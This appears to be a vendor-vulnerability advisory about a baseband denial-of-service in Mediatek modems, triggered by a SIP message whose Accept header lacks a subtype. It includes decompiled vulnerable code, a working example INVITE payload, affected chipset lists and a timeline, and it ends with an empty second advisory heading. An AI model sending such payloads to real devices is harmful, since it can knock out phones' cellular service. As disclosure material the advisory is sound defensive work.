An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.

The impact is DoS in the baseband, triggered by malformed VoLTE message such as SIP INVITE or MESSAGE request.

The vulnerability described in this advisory affected a wide range of Mediatek devices. This vulnerability is assigned CVE-2025-20725.

Vulnerability Details

Crash happens due to a NULL access.

sip_msg_content_type_compatible assumes a content type with a subcontenttype (e.g. text/plain), but inet_msg_unpack_content_type accepts a content type without a subcontenttype (e.g. text).

bool sip_msg_content_type_compatible(char **accept,char **contentType)
{
  int iVar1;
  char *pcVar2;
  char *pcVar3;

  iVar1 = voip_strcasecmp(accept[0],"*");
  pcVar3 = "*";
  // If the Accept is in format */something, accept anything, if the Accept is exactly */*
  if (iVar1 != 0) {
    // Here we know that main_content_type is specific in the Accept header
    iVar1 = voip_strcasecmp(contentType[0],"*");
    if (iVar1 == 0) {
      // ??? wildcard in Content-Type is invalid
      pcVar2 = contentType[1];
      pcVar3 = "*";
      return voip_strcasecmp(accept[1],pcVar3);
    }
    // no wildcards in main content type
    iVar1 = voip_strcasecmp(*accept,*contentType);
    if (iVar1 != 0) {
      // mismatch in main content type
      return false;
    }
    iVar1 = voip_strcasecmp(accept[1],"*");
    if ((iVar1 == 0) || (iVar1 = voip_strcasecmp(contentType[1],"*"), iVar1 == 0)) {
      // wildcard specified either in Accept (or Content-Type???)
      return true;
    }
    pcVar3 = contentType[1];
  }
  pcVar2 = accept[1];
LAB_90ba05dc:
  iVar1 = voip_strcasecmp(pcVar2,pcVar3);
  return iVar1 == 0;
}

Example payload

INVITE sip:2 SIP/2.0
Accept: application
From: <sip:1>;tag=ttecbsI
To: <sip:2>
CSeq: 1 INVITE

Affected Devices

Includes most, possibly all, of the following devices:

MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893

Timeline

2025.06.23. Bug reported to Mediatek PSIRT
2025.07.23. Mediatek confirms vulnerability, does not assign CVE due to low severity
2025.10.01. Advisory release

MSV-4625: Mediatek Baseband Denial of Service During Parsing Invalid Accept header

Vulnerability Details

Example payload

Affected Devices

Timeline